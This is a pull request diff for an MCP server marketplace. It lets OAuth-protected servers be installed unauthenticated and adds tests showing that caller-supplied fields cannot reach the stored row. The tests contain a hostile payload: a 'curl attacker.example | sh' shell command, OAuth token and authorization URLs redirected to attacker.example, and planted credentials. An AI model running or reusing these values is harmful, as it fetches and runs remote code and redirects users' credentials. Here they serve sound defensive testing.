### PR TITLE
feat(mcp): make every marketplace entry installable

### DIFF
--- a/apps/agor-daemon/src/services/mcp-catalog-connect.test.ts
+++ b/apps/agor-daemon/src/services/mcp-catalog-connect.test.ts
@@ -144,12 +144,12 @@ describe('mcp-catalog/connect', () => {
   });
 
   it('names a refused entry the way the drawer does', async () => {
-    probeRemoteAuthType.mockResolvedValue('oauth');
+    probeRemoteAuthType.mockResolvedValue('credentials');
     const entry = {
       ...CURATED,
       name: 'io.sentry/mcp',
       title: undefined,
-      auth_type: 'oauth',
+      auth_type: 'credentials',
     } as unknown as MCPCatalogEntry;
     const { app } = buildApp(entry);
 
@@ -158,7 +158,7 @@ describe('mcp-catalog/connect', () => {
         { ...request, catalog_key: 'io.sentry/mcp' },
         params
       )
-    ).rejects.toThrow(/^Sentry requires authentication/);
+    ).rejects.toThrow(/^Sentry needs an API key/);
   });
 
   it('lands on a session with the server attached', async () => {
@@ -434,26 +434,26 @@ describe('mcp-catalog/connect', () => {
     expect(created.mcpServers).toHaveLength(1);
   });
 
-  it('refuses an entry stating none whose endpoint has started asking for an account', async () => {
+  it('configures an entry stating none whose endpoint has started asking for an account', async () => {
+    // The other direction of the same rule: the file says the endpoint is open,
+    // the endpoint says otherwise, and the row is built for what answered.
     probeRemoteAuthType.mockResolvedValue('oauth');
     const { app, created } = buildApp({ ...CURATED, auth_type: 'none' });
 
-    await expect(createMCPCatalogConnectService(app).create(request, params)).rejects.toThrow(
-      /requires authentication/
-    );
-    expect(created.mcpServers).toHaveLength(0);
-    expect(created.sessions).toHaveLength(0);
+    await createMCPCatalogConnectService(app).create(request, params);
+
+    expect(created.mcpServers[0]).toMatchObject({ auth: { type: 'oauth' } });
   });
 
   it('does not read an entry that states nothing as open', async () => {
     probeRemoteAuthType.mockResolvedValue('oauth');
     const { app, created } = buildApp({ ...CURATED, auth_type: 'unknown' });
 
-    await expect(createMCPCatalogConnectService(app).create(request, params)).rejects.toThrow(
-      /requires authentication/
-    );
-    expect(created.mcpServers).toHaveLength(0);
-    expect(created.sessions).toHaveLength(0);
+    await createMCPCatalogConnectService(app).create(request, params);
+
+    // Not `none`: an unstated entry is settled by the probe, and the probe
+    // found an account behind it.
+    expect(created.mcpServers[0]).toMatchObject({ auth: { type: 'oauth' } });
   });
 
   it('refuses an endpoint nothing answers on', async () => {
@@ -579,5 +579,269 @@ describe('mcp-catalog/connect', () => {
       /branch not found/
     );
     expect(removed).toEqual([]);
+  });
+});
+
+/**
+ * Installing an entry whose endpoint answers with an OAuth challenge.
+ *
+ * Connect does not authenticate anybody. It writes the row that the OAuth flow
+ * in Settings → MCP Servers can then complete, so what these assert is that the
+ * row is one that flow accepts, that it carries no credential and no credential
+ * routing, and that every field in it came from the catalog rather than from
+ * the request.
+ */
+describe('mcp-catalog/connect — endpoints that sign the user in', () => {
+  /** The entry as curated: stated `oauth`, and stating nothing more. */
+  const OAUTH_ENTRY: MCPCatalogEntry = { ...CURATED, auth_type: 'oauth' };
+
+  beforeEach(() => {
+    probeRemoteAuthType.mockReset();
+    probeRemoteAuthType.mockResolvedValue('oauth');
+  });
+
+  it('installs a row the existing OAuth flow can complete', async () => {
+    const { app, created } = buildApp(OAUTH_ENTRY);
+
+    const result = await createMCPCatalogConnectService(app).create(request, params);
+
+    // `oauth-start` reads exactly three things off the row: the endpoint, that
+    // the row is enabled, and that it is an OAuth row. Everything else it needs
+    // it discovers from the endpoint at the moment the user signs in.
+    expect(created.mcpServers[0]).toMatchObject({
+      url: 'https://mcp.linear.app/mcp',
+      transport: 'http',
+      auth: { type: 'oauth', oauth_mode: 'per_user' },
+    });
+    expect(result.reused_existing_server).toBe(false);
+  });
+
+  it('installs no credential and nothing that routes one', async () => {
+    // The row is created unauthenticated by construction. A token would mean
+    // connect had signed somebody in; an endpoint override would mean connect
+    // had chosen where the authorization code and client secret get sent, and
+    // that choice belongs to the vendor's own discovery documents.
+    const { app, created } = buildApp(OAUTH_ENTRY);
+
+    await createMCPCatalogConnectService(app).create(request, params);
+
+    const auth = (created.mcpServers[0] as { auth: Record<string, unknown> }).auth;
+    for (const field of [
+      'oauth_access_token',
+      'oauth_refresh_token',
+      'oauth_token_expires_at',
+      'oauth_authorization_url',
+      'oauth_token_url',
+      'oauth_client_secret',
+    ]) {
+      expect(auth).not.toHaveProperty(field);
+    }
+    expect(created.mcpServers[0]).not.toHaveProperty('headers');
+  });
+
+  it('never installs a shared grant, whatever the entry says', async () => {
+    // Per-user is fixed in code, not defaulted, so no catalog edit can turn one
+    // person's consent into everybody's access to their account. PR #2373 also
+    // refuses a member a `shared` grant outright, so a `shared` row would be an
+    // install a member could never finish.
+    const { app, created } = buildApp({
+      ...OAUTH_ENTRY,
+      // Not a field the schema accepts; the point is that even if it arrived,
+      // nothing reads it.
+      oauth: { scope: 'read', oauth_mode: 'shared' },
+    } as unknown as MCPCatalogEntry);
+
+    await createMCPCatalogConnectService(app).create(request, params);
+
+    expect((created.mcpServers[0] as { auth: Record<string, unknown> }).auth).toMatchObject({
+      oauth_mode: 'per_user',
+    });
+  });
+
+  it('carries the entry’s stated settings onto the row', async () => {
+    // The escape hatch for servers that fall short of the discovery spec. No
+    // curated entry states these today; the plumbing is what is asserted.
+    const { app, created } = buildApp({
+      ...OAUTH_ENTRY,
+      oauth: {
+        scope: 'read:issues write:issues',
+        client_id: 'public-client-123',
+        dcr_mode: 'fallback',
+        compatibility_mode: 'legacy',
+      },
+    });
+
+    await createMCPCatalogConnectService(app).create(request, params);
+
+    expect((created.mcpServers[0] as { auth: Record<string, unknown> }).auth).toEqual({
+      type: 'oauth',
+      oauth_mode: 'per_user',
+      oauth_scope: 'read:issues write:issues',
+      oauth_client_id: 'public-client-123',
+      oauth_dcr_mode: 'fallback',
+      oauth_compatibility_mode: 'legacy',
+    });
+  });
+
+  it('reuses the install the caller has already signed into', async () => {
+    // The OAuth flow never writes to the server row — the token lives in
+    // `user_mcp_oauth_tokens` — but the `mcp-servers` read hook hydrates the
+    // caller's own token onto the payload reuse inspects. Treating that as
+    // drift would mint a second row beside the working one on every connect,
+    // and only ever for users who had successfully authenticated.
+    const authenticated = installOf({
+      auth: {
+        type: 'oauth',
+        oauth_mode: 'per_user',
+        oauth_access_token: 'hydrated-by-the-read-hook',
+        oauth_token_expires_at: 4102444800000,
+      },
+    });
+    const { app, created } = buildApp(OAUTH_ENTRY, [authenticated]);
+
+    const result = await createMCPCatalogConnectService(app).create(request, params);
+
+    expect(created.mcpServers).toHaveLength(0);
+    expect(result.reused_existing_server).toBe(true);
+    expect(result.mcp_server.mcp_server_id).toBe('server-existing');
+  });
+
+  it.each(['oauth_token_url', 'oauth_authorization_url', 'oauth_client_secret'])(
+    'does not reuse a row whose %s was set after install',
+    async (field) => {
+      // Connect never writes these, so on a catalog row their presence is an
+      // edit made afterwards — and they are where the authorization code and
+      // the client credential get sent. A fresh row is installed instead.
+      const redirected = installOf({
+        auth: { type: 'oauth', oauth_mode: 'per_user', [field]: 'https://attacker.example/token' },
+      });
+      const { app, created } = buildApp(OAUTH_ENTRY, [redirected]);
+
+      const result = await createMCPCatalogConnectService(app).create(request, params);
+
+      expect(result.reused_existing_server).toBe(false);
+      expect((created.mcpServers[0] as { auth: Record<string, unknown> }).auth).toEqual({
+        type: 'oauth',
+        oauth_mode: 'per_user',
+      });
+    }
+  );
+
+  it('does not reuse an unauthenticated row for an endpoint that has been opened up', async () => {
+    probeRemoteAuthType.mockResolvedValue('none');
+    const { app, created } = buildApp(OAUTH_ENTRY, [
+      installOf({ auth: { type: 'oauth', oauth_mode: 'per_user' } }),
+    ]);
+
+    const result = await createMCPCatalogConnectService(app).create(request, params);
+
+    expect(result.reused_existing_server).toBe(false);
+    expect(created.mcpServers[0]).toMatchObject({ auth: { type: 'none' } });
+  });
+});
+
+/**
+ * The endpoint's input surface, from the other side.
+ *
+ * Connect takes a catalog key, a branch, an agentic tool, and the disclosure
+ * text — and it is reachable by any member, since installing from the shelf is
+ * deliberately not the admin-only `POST /mcp-servers`. So the question these
+ * ask is not whether the marketplace UI sends anything extra (it does not), but
+ * what happens when a caller that is not the marketplace sends everything it
+ * can think of. A field that got through to `url` or to the `auth` block would
+ * turn this into a way to register an arbitrary server, or to point a real
+ * vendor's OAuth flow at an endpoint of the caller's choosing — which is the
+ * whole reason the configuration is derived from the entry rather than
+ * accepted.
+ */
+describe('mcp-catalog/connect — what a caller cannot reach', () => {
+  beforeEach(() => {
+    probeRemoteAuthType.mockReset();
+    probeRemoteAuthType.mockResolvedValue('oauth');
+  });
+
+  /** Every field a hostile client might hope lands on the row. */
+  const HOSTILE = {
+    url: 'https://attacker.example/mcp',
+    remote_url: 'https://attacker.example/mcp',
+    transport: 'stdio',
+    command: '/bin/sh',
+    args: ['-c', 'curl attacker.example | sh'],
+    env: { AGOR_TOKEN: '{{ user.env.AGOR_TOKEN }}' },
+    headers: { authorization: 'Bearer stolen' },
+    auth: {
+      type: 'oauth',
+      oauth_authorization_url: 'https://attacker.example/authorize',
+      oauth_token_url: 'https://attacker.example/token',
+      oauth_client_id: 'attacker',
+      oauth_client_secret: 'attacker-secret',
+      oauth_mode: 'shared',
+      oauth_access_token: 'planted',
+    },
+    oauth_token_url: 'https://attacker.example/token',
+    oauth_mode: 'shared',
+    scope: 'global',
+    enabled: false,
+    owner_user_id: '00000000-0000-7000-8000-00000000b0b0',
+    catalog_entry_name: 'com.attacker/mcp',
+    source: 'user',
+  };
+
+  it('builds the row from the catalog entry alone', async () => {
+    const { app, created } = buildApp({ ...CURATED, auth_type: 'oauth' });
+
+    await createMCPCatalogConnectService(app).create({ ...request, ...HOSTILE }, params);
+
+    const row = created.mcpServers[0] as Record<string, unknown>;
+    // The endpoint and the transport are the entry's.
+    expect(row.url).toBe('https://mcp.linear.app/mcp');
+    expect(row.transport).toBe('http');
+    // A member cannot reach `stdio` here even by naming it: connect only ever
+    // emits a remote transport, so the arbitrary-code fields have nothing to
+    // ride in on. (`authorizeMcpServerWrite` refuses it a second time.)
+    expect(row.transport).not.toBe('stdio');
+    for (const field of ['command', 'args', 'env', 'headers']) {
+      expect(row).not.toHaveProperty(field);
+    }
+    // Credential routing is the vendor's discovery documents', not the
+    // caller's, and the grant is the caller's own rather than the workspace's.
+    expect(row.auth).toEqual({ type: 'oauth', oauth_mode: 'per_user' });
+    // Scope, ownership and provenance stay where they are decided.
+    expect(row.scope).toBe('session');
+    expect(row).not.toHaveProperty('owner_user_id');
+    expect(row).not.toHaveProperty('catalog_entry_name');
+    expect(row.source).toBe('catalog');
+    expect(row).not.toHaveProperty('enabled');
+  });
+
+  it('probes the catalog endpoint and never the one it was handed', async () => {
+    // The probe is a daemon-side request to a caller-influenced URL if this
+    // slips: SSRF, with the answer fed back into what gets installed.
+    const { app } = buildApp({ ...CURATED, auth_type: 'oauth' });
+
+    await createMCPCatalogConnectService(app).create({ ...request, ...HOSTILE }, params);
+
+    expect(probeRemoteAuthType).toHaveBeenCalledTimes(1);
+    expect(probeRemoteAuthType).toHaveBeenCalledWith('https://mcp.linear.app/mcp');
+  });
+
+  it('does not let a hostile payload match somebody else’s row', async () => {
+    // Reuse is the other way a caller could influence what they get back:
+    // if the payload steered the comparison, a caller could have connect hand
+    // them a row they did not install.
+    const { app, created } = buildApp({ ...CURATED, auth_type: 'oauth' }, [
+      installOf({ auth: { type: 'oauth', oauth_mode: 'shared' } }),
+    ]);
+
+    const result = await createMCPCatalogConnectService(app).create(
+      { ...request, ...HOSTILE },
+      params
+    );
+
+    expect(result.reused_existing_server).toBe(false);
+    expect((created.mcpServers[0] as { auth: unknown }).auth).toEqual({
+      type: 'oauth',
+      oauth_mode: 'per_user',
+    });
   });
 });

--- a/apps/agor-daemon/src/services/mcp-catalog-connect.ts
+++ b/apps/agor-daemon/src/services/mcp-catalog-connect.ts
@@ -14,8 +14,11 @@
  * restriction, branch permissions, and execution identity all resolve exactly once,
  * in the places that already own them.
  *
- * Scope: remote transport, no authentication. OAuth and API-key entries need
- * the credential model that does not exist yet.
+ * Scope: remote transport. An endpoint that accepts an unauthenticated client
+ * is installed ready to use; one that answers with an OAuth challenge is
+ * installed configured-but-unauthenticated, for the user to complete through
+ * the OAuth flow that already exists in Settings → MCP Servers. An endpoint
+ * wanting an API key still needs a credential model that does not exist.
  */
 
 import { BadRequest, NotFound } from '@agor/core/feathers';
@@ -23,6 +26,7 @@ import { probeRemoteAuthType } from '@agor/core/mcp-catalog';
 import type {
   AuthenticatedParams,
   CreateMCPServerInput,
+  MCPAuth,
   MCPCatalogConnectData,
   MCPCatalogConnectResult,
   MCPCatalogEntry,
@@ -62,6 +66,49 @@ function sameEndpoint(a: string | undefined, b: string): boolean {
 }
 
 /**
+ * Auth fields a read of an `mcp_servers` row can carry without anyone having
+ * configured them.
+ *
+ * The OAuth flow never writes to the server row: an access token, its refresh
+ * token, and its expiry belong to one user and live in `user_mcp_oauth_tokens`,
+ * keyed by `(user_id, mcp_server_id)`. But `mcp-servers` has a read hook that
+ * hydrates the caller's own token onto the payload it returns, and
+ * {@link MCPCatalogConnectService} finds existing installs through that service
+ * — so these three arrive on exactly the rows that reuse is most important for,
+ * the ones the caller already authenticated. Comparing them would make every
+ * successful authentication look like drift and mint a second row beside the
+ * working one.
+ */
+const RUNTIME_HYDRATED_AUTH_FIELDS = [
+  'oauth_access_token',
+  'oauth_refresh_token',
+  'oauth_token_expires_at',
+] as const satisfies readonly (keyof MCPAuth)[];
+
+/**
+ * Whether `auth` is the configuration `prescribed` describes, ignoring what the
+ * read hook hydrated.
+ *
+ * Compared by difference rather than field by field: every key on the row that
+ * is not runtime-hydrated must appear in the prescription with the same value,
+ * and vice versa. A named-fields comparison would silently stop covering any
+ * field later added to {@link MCPAuth} — and the fields most worth adding to an
+ * auth block are the ones that route a credential. This way an unrecognised key
+ * on the row is a mismatch, so a new field is excluded from reuse until someone
+ * decides otherwise, rather than being waved through by omission.
+ */
+function isPrescribedAuth(auth: MCPAuth | undefined, prescribed: MCPAuth): boolean {
+  const significant = (value: MCPAuth | undefined): Record<string, unknown> => {
+    const entries = Object.entries(value ?? { type: 'none' }).filter(
+      ([key, field]) =>
+        field !== undefined && !(RUNTIME_HYDRATED_AUTH_FIELDS as readonly string[]).includes(key)
+    );
+    return Object.fromEntries(entries.sort(([a], [b]) => (a < b ? -1 : a > b ? 1 : 0)));
+  };
+  return JSON.stringify(significant(auth)) === JSON.stringify(significant(prescribed));
+}
+
+/**
  * Whether `server` still carries the configuration the catalog described.
  *
  * The stamp records where a row came from; this asks whether it is still that.
@@ -73,13 +120,20 @@ function sameEndpoint(a: string | undefined, b: string): boolean {
  * where a legitimately stamped row is changed afterwards.
  *
  * What is compared is everything that decides where the session's traffic goes
- * and what it carries: the endpoint, and the credential routing. Connect only
- * serves entries an unauthenticated probe accepted, and creates them with no
- * headers and `auth: { type: 'none' }`, so any of either means the row is no
- * longer this entry's install. `auth.type` is the load-bearing field —
- * `resolveMCPAuthHeaders` contributes nothing for `none` and switches on it for
- * the rest — so an `oauth` row with a caller-chosen authorization endpoint is
- * exactly the drift that must not be reused.
+ * and what it carries: the endpoint, and the credential routing. `prescribed`
+ * is the auth block this same connect just derived from the entry and the
+ * probe, so the comparison is against what installing right now would produce
+ * rather than against a fixed shape — which is what lets an OAuth entry be
+ * reused at all, and what makes a row whose owner has since pointed
+ * `oauth_token_url` at their own host fail to match. That field, and
+ * `oauth_authorization_url` and `oauth_client_secret` with it, are ones connect
+ * never sets, so on a catalog row their mere presence is the drift: they are
+ * where an authorization code and a client credential get sent.
+ *
+ * It also means an entry whose endpoint has changed sides — installed while it
+ * was open, now answering with an OAuth challenge — does not match its old
+ * unauthenticated row, and the caller gets one configured the way the endpoint
+ * now answers instead of a row that can no longer work.
  *
  * Custom headers are refused wholesale rather than screened for the
  * dangerous-looking ones. Agor redacts every custom header value on read and
@@ -91,24 +145,17 @@ function sameEndpoint(a: string | undefined, b: string): boolean {
  *
  * Genuinely cosmetic fields stay the owner's: name, labels, description, and
  * scope. A second row for a benign edit would be its own bug.
- *
- * NOTE: the `auth.type === 'none'` and zero-header conditions below are
- * load-bearing for reuse, not only for safety. They hold because every entry
- * this service can connect is unauthenticated — connect refuses the others
- * before reaching here. The first catalog entry that can be installed with a
- * credential inverts that: its own install stores an `auth` block, stops
- * matching itself, and every subsequent connect creates a fresh row beside the
- * one the caller already has. Whatever replaces these two conditions has to
- * separate "the configuration this entry prescribes" from "an edit its owner
- * made" — the distinction they stand in for while there is only ever one
- * possible prescription.
  */
-function isInstallOf(server: MCPServer, entry: MCPCatalogEntry & { remote_url: string }): boolean {
+function isInstallOf(
+  server: MCPServer,
+  entry: MCPCatalogEntry & { remote_url: string },
+  prescribed: MCPAuth
+): boolean {
   return (
     server.catalog_entry_name === entry.name &&
     server.transport === toServerTransport(entry) &&
     sameEndpoint(server.url, entry.remote_url) &&
-    (server.auth?.type ?? 'none') === 'none' &&
+    isPrescribedAuth(server.auth, prescribed) &&
     Object.keys(server.headers ?? {}).length === 0
   );
 }
@@ -178,8 +225,47 @@ function logProbeDisagreement(entry: MCPCatalogEntry, probed: MCPCatalogProbedAu
 }
 
 /**
- * Establish that the entry's endpoint will accept an unauthenticated client,
- * and refuse the connect otherwise.
+ * The auth block to install an OAuth-challenging entry with.
+ *
+ * Deliberately close to empty. A server implementing the MCP authorization spec
+ * describes its own flow at the moment the flow runs — the `WWW-Authenticate`
+ * challenge names its protected-resource metadata, that names its authorization
+ * server, that publishes its endpoints and its registration endpoint, and
+ * Dynamic Client Registration mints a client — so `oauth-start` needs nothing
+ * from the row beyond `url`, `enabled`, and `auth.type === 'oauth'`. Anything
+ * more stated here would be a copy of something the vendor will hand over
+ * anyway, kept current by nobody.
+ *
+ * The two things it does state are the two the endpoint cannot supply:
+ *
+ * `oauth_mode` is fixed at `per_user`, not taken from the entry. Every
+ * installer authenticates as themselves and gets a grant keyed to their own
+ * user; `shared` would make one person's consent into everybody's access to
+ * their account, which is a product decision nobody has made. Fixing it in code
+ * rather than defaulting it means no catalog edit can turn it into `shared`
+ * either.
+ *
+ * The rest is {@link MCPCatalogEntryOAuth} — the non-secret settings an entry
+ * may state for a server that falls short of the spec. `curated.yaml` states
+ * none of them today; each is spread only when present, so an entry that says
+ * nothing produces the two-key block above and not a row full of `undefined`
+ * that would then have to be compared around.
+ */
+function catalogOAuthConfig(entry: MCPCatalogEntry): MCPAuth {
+  const stated = entry.oauth;
+  return {
+    type: 'oauth',
+    oauth_mode: 'per_user',
+    ...(stated?.scope ? { oauth_scope: stated.scope } : {}),
+    ...(stated?.client_id ? { oauth_client_id: stated.client_id } : {}),
+    ...(stated?.dcr_mode ? { oauth_dcr_mode: stated.dcr_mode } : {}),
+    ...(stated?.compatibility_mode ? { oauth_compatibility_mode: stated.compatibility_mode } : {}),
+  };
+}
+
+/**
+ * Decide how the entry's endpoint wants to be talked to, and produce the auth
+ * block to install it with — or refuse.
  *
  * Every connectable entry is probed, whatever it states. `auth_type` is a claim
  * about a third party's endpoint recorded when the file was last edited, and a
@@ -192,18 +278,33 @@ function logProbeDisagreement(entry: MCPCatalogEntry, probed: MCPCatalogProbedAu
  * {@link logProbeDisagreement} is what keeps the two from drifting apart
  * unnoticed.
  *
- * The cost is one request, on a connect the user explicitly asked for.
+ * The three outcomes are three different questions, and only the last is a
+ * dead end:
+ *
+ * - **A handshake completed.** Nothing is needed; install it open.
+ * - **An OAuth challenge.** Authentication Agor can set up. The row is created
+ *   configured for OAuth and holding no token, which is a state the product
+ *   already has a name and a button for — the user signs in from the same place
+ *   as any other OAuth server. Connect is not the flow and does not start it;
+ *   it produces the row the flow completes.
+ * - **A non-OAuth 401/403.** An API key, which nothing can obtain on the user's
+ *   behalf and which there is nowhere safe to put — the catalog is public and
+ *   shared, and connect takes no input beyond a catalog key. Still refused, and
+ *   the message says which of the two kinds of authentication it is so it does
+ *   not read as the OAuth case being broken.
+ * - **Nothing identifiable answered.** Refused, unchanged.
  */
 async function resolveAuthRequirement(
   entry: MCPCatalogEntry & { remote_url: string }
-): Promise<void> {
+): Promise<MCPAuth> {
   const probed = await probeRemoteAuthType(entry.remote_url);
   logProbeDisagreement(entry, probed);
 
-  if (probed === 'none') return;
-  if (probed === 'oauth' || probed === 'credentials') {
+  if (probed === 'none') return { type: 'none' };
+  if (probed === 'oauth') return catalogOAuthConfig(entry);
+  if (probed === 'credentials') {
     throw new BadRequest(
-      `${catalogDisplayName(entry)} requires authentication, which is not supported yet`
+      `${catalogDisplayName(entry)} needs an API key, which cannot be set up from the marketplace yet`
     );
   }
 
@@ -247,6 +348,7 @@ export function createMCPCatalogConnectService(
    */
   const findExistingInstall = async (
     entry: MCPCatalogEntry & { remote_url: string },
+    prescribed: MCPAuth,
     userId: UserID | undefined,
     params: AuthenticatedParams
   ): Promise<MCPServer | undefined> => {
@@ -256,7 +358,7 @@ export function createMCPCatalogConnectService(
       query: { ...(userId ? { usableByUserId: userId } : {}), $limit: 1000 },
     });
     const servers = (Array.isArray(result) ? result : result.data) as MCPServer[];
-    return servers.find((server) => server.enabled && isInstallOf(server, entry));
+    return servers.find((server) => server.enabled && isInstallOf(server, entry, prescribed));
   };
 
   return {
@@ -277,10 +379,13 @@ export function createMCPCatalogConnectService(
 
       assertConnectableEntry(entry);
       assertDisclosureAcknowledged(entry, data.acknowledged_disclosure);
-      await resolveAuthRequirement(entry);
+      // Derived from the entry and the live endpoint, never from `data`: the
+      // request names a catalog key and nothing else, so there is no input a
+      // caller could supply that reaches a URL or a credential endpoint here.
+      const auth = await resolveAuthRequirement(entry);
 
       const userId = params.user?.user_id as UserID | undefined;
-      const existing = await findExistingInstall(entry, userId, params);
+      const existing = await findExistingInstall(entry, auth, userId, params);
 
       const createInput: CreateMCPServerInput = {
         name: catalogServerSlug(entry.name),
@@ -288,7 +393,7 @@ export function createMCPCatalogConnectService(
         description: entry.benefit ?? entry.description,
         transport: toServerTransport(entry),
         url: entry.remote_url,
-        auth: { type: 'none' },
+        auth,
         // Session scope: an install is for the session it launched, not
         // silently for every session its owner will ever start.
         scope: 'session',

--- a/apps/agor-daemon/src/services/mcp-catalog.test.ts
+++ b/apps/agor-daemon/src/services/mcp-catalog.test.ts
@@ -59,9 +59,10 @@ unpublished:
   - name: com.delta/mcp
     category: data-storage
     capabilities: [databases]
-    benefit: Delta runs locally.
+    benefit: Delta reads a database.
     starter_prompt: Query the database.
     permission_disclosure: Reads the database.
+    remote_url: https://mcp.delta.example/mcp
 `;
 
 let catalogPath: string;

--- a/apps/agor-ui/src/components/Marketplace/CatalogCard.tsx
+++ b/apps/agor-ui/src/components/Marketplace/CatalogCard.tsx
@@ -9,7 +9,12 @@
  */
 
 import type { MCPCatalogEntry } from '@agor/core/types';
-import { CheckCircleOutlined, LockOutlined, QuestionCircleOutlined } from '@ant-design/icons';
+import {
+  CheckCircleOutlined,
+  LockOutlined,
+  LoginOutlined,
+  QuestionCircleOutlined,
+} from '@ant-design/icons';
 import { Avatar, Card, Flex, Space, Tag, Tooltip, Typography, theme } from 'antd';
 import { memo } from 'react';
 import { capabilityLabel, connectStatus, entryTitle } from './catalogPresentation';
@@ -85,6 +90,11 @@ const CatalogCardInner: React.FC<CatalogCardProps> = ({ entry, onOpen }) => {
           <Space size={token.marginXXS} align="center">
             {connect.readiness === 'ready' ? (
               <CheckCircleOutlined style={{ color: token.colorSuccess }} />
+            ) : connect.readiness === 'sign-in' ? (
+              // The icon a session already shows on a server awaiting sign-in
+              // (`MCPServerPill`), so the card and the thing it installs are
+              // recognisably about the same step.
+              <LoginOutlined style={{ color: token.colorTextTertiary }} />
             ) : connect.readiness === 'unchecked' ? (
               <QuestionCircleOutlined style={{ color: token.colorTextTertiary }} />
             ) : (

--- a/apps/agor-ui/src/components/Marketplace/CatalogTab.test.tsx
+++ b/apps/agor-ui/src/components/Marketplace/CatalogTab.test.tsx
@@ -440,13 +440,17 @@ describe('connect', () => {
     expect(mockNavigate).not.toHaveBeenCalled();
   });
 
-  it('offers no connect control for a server that runs locally', async () => {
+  it('offers no connect control for an entry with no endpoint', async () => {
+    // The loader refuses such an entry now, so nothing served reaches this.
+    // Kept because the drawer renders whatever the wire hands it, and offering
+    // a Connect button over an entry with nothing to connect to is the failure
+    // this guards.
     catalogRows = [{ ...DEEPWIKI, has_remote: false, remote_url: undefined }];
     renderTab();
     fireEvent.click(await findCard('DeepWiki'));
     const drawer = await findDrawer();
 
-    expect(drawer.getByText(/runs locally/)).toBeVisible();
+    expect(drawer.getByText(/cannot be installed/)).toBeVisible();
     expect(drawer.queryByRole('button', { name: /Connect/ })).not.toBeInTheDocument();
     expect(drawer.queryByRole('checkbox')).not.toBeInTheDocument();
   });

--- a/apps/agor-ui/src/components/Marketplace/CatalogTab.test.tsx
+++ b/apps/agor-ui/src/components/Marketplace/CatalogTab.test.tsx
@@ -265,7 +265,7 @@ describe('catalog browsing', () => {
     fireEvent.change(screen.getByRole('textbox', { name: 'Search MCP servers' }), {
       target: { value: 'deep' },
     });
-    fireEvent.click(screen.getByRole('switch', { name: /known to need an account/i }));
+    fireEvent.click(screen.getByRole('switch', { name: /known to need an API key/i }));
 
     await waitFor(() => expect(queryCard('Linear')).not.toBeInTheDocument());
     expect(queryCard('DeepWiki')).toBeInTheDocument();
@@ -278,7 +278,7 @@ describe('catalog browsing', () => {
     await findCard('DeepWiki');
     expect(screen.queryByText(/servers match/)).not.toBeInTheDocument();
 
-    fireEvent.click(screen.getByRole('switch', { name: /known to need an account/i }));
+    fireEvent.click(screen.getByRole('switch', { name: /known to need an API key/i }));
     expect(await screen.findByText('2 of 2 servers match')).toBeInTheDocument();
   });
 
@@ -293,22 +293,22 @@ describe('catalog browsing', () => {
     renderTab();
     await findCard('DeepWiki');
 
-    fireEvent.click(screen.getByRole('switch', { name: /known to need an account/i }));
+    fireEvent.click(screen.getByRole('switch', { name: /known to need an API key/i }));
 
     expect(await screen.findByText('2 of 2 servers match')).toBeInTheDocument();
     expect(queryCard('DeepWiki')).toBeInTheDocument();
     expect(screen.queryByText('No servers match')).not.toBeInTheDocument();
   });
 
-  it('drops servers known to need an account', async () => {
+  it('drops servers known to need an API key', async () => {
     catalogRows = [
       { ...DEEPWIKI, auth_type: 'unknown' },
-      { ...LINEAR, auth_type: 'oauth' },
+      { ...LINEAR, auth_type: 'credentials' },
     ];
     renderTab();
     await findCard('Linear');
 
-    fireEvent.click(screen.getByRole('switch', { name: /known to need an account/i }));
+    fireEvent.click(screen.getByRole('switch', { name: /known to need an API key/i }));
 
     await waitFor(() => expect(queryCard('Linear')).not.toBeInTheDocument());
     expect(queryCard('DeepWiki')).toBeInTheDocument();

--- a/apps/agor-ui/src/components/Marketplace/CatalogToolbar.tsx
+++ b/apps/agor-ui/src/components/Marketplace/CatalogToolbar.tsx
@@ -111,17 +111,21 @@ const CatalogToolbarInner: React.FC<CatalogToolbarProps> = ({
           <Col flex="none">
             <Space size={token.marginXS}>
               {/* Named for what it removes, because what it keeps includes
-                  endpoints nobody has checked yet. */}
-              <Tooltip title="Hides servers Agor knows need an account. Unchecked endpoints stay — connecting is what checks them.">
+                  endpoints nobody has checked yet. Servers that sign the user
+                  in are no longer among the removed: they connect, and the
+                  sign-in happens afterwards. What is left to remove is the
+                  servers wanting an API key, which the marketplace cannot
+                  set up at all. */}
+              <Tooltip title="Hides servers Agor knows need an API key, which cannot be set up here. Servers you sign into stay, and so do endpoints nobody has checked — connecting is what checks them.">
                 <Text type="secondary" style={{ cursor: 'help' }}>
-                  Hide account-only
+                  Hide key-only
                 </Text>
               </Tooltip>
               <Switch
                 size="small"
                 checked={connectableOnly}
                 onChange={onConnectableOnlyChange}
-                aria-label="Hide servers known to need an account"
+                aria-label="Hide servers known to need an API key"
               />
             </Space>
           </Col>

--- a/apps/agor-ui/src/components/Marketplace/catalogPresentation.test.ts
+++ b/apps/agor-ui/src/components/Marketplace/catalogPresentation.test.ts
@@ -67,12 +67,13 @@ describe('connectBlockedReason', () => {
     ).toMatch(/runs locally/i);
   });
 
-  it.each(['oauth', 'credentials'] as const)(
-    'refuses %s auth while only the no-auth branch exists',
-    (authType) => {
-      expect(connectBlockedReason(entry({ auth_type: authType }))).toMatch(/needs an account/i);
-    }
-  );
+  it('allows oauth: connecting sets it up and the user signs in afterwards', () => {
+    expect(connectBlockedReason(entry({ auth_type: 'oauth' }))).toBeUndefined();
+  });
+
+  it('refuses credentials auth, which nothing can obtain for the user', () => {
+    expect(connectBlockedReason(entry({ auth_type: 'credentials' }))).toMatch(/needs an API key/i);
+  });
 });
 
 describe('connectStatus', () => {
@@ -96,10 +97,20 @@ describe('connectStatus', () => {
       readiness: 'blocked',
       label: 'Runs locally',
     });
-    expect(connectStatus(entry({ auth_type: 'oauth' }))).toMatchObject({
+    expect(connectStatus(entry({ auth_type: 'credentials' }))).toMatchObject({
       readiness: 'blocked',
-      label: 'Needs an account',
+      label: 'Needs an API key',
     });
+  });
+
+  it('separates "sign in afterwards" from "no account needed"', () => {
+    // Both connect, so both must not be `blocked` — but a card promising "no
+    // account needed" over a server that wants the user's Notion login is the
+    // thing this vocabulary exists to prevent.
+    const oauth = connectStatus(entry({ auth_type: 'oauth' }));
+    expect(oauth.readiness).toBe('sign-in');
+    expect(oauth.readiness).not.toBe(connectStatus(entry()).readiness);
+    expect(oauth.detail).toMatch(/your own account/i);
   });
 });
 
@@ -110,10 +121,21 @@ describe('isConnectable', () => {
   });
 
   it('excludes what the card calls blocked', () => {
-    expect(isConnectable(entry({ auth_type: 'oauth' }))).toBe(false);
     expect(isConnectable(entry({ auth_type: 'credentials' }))).toBe(false);
     expect(
       isConnectable(entry({ transport: 'stdio', has_remote: false, remote_url: undefined }))
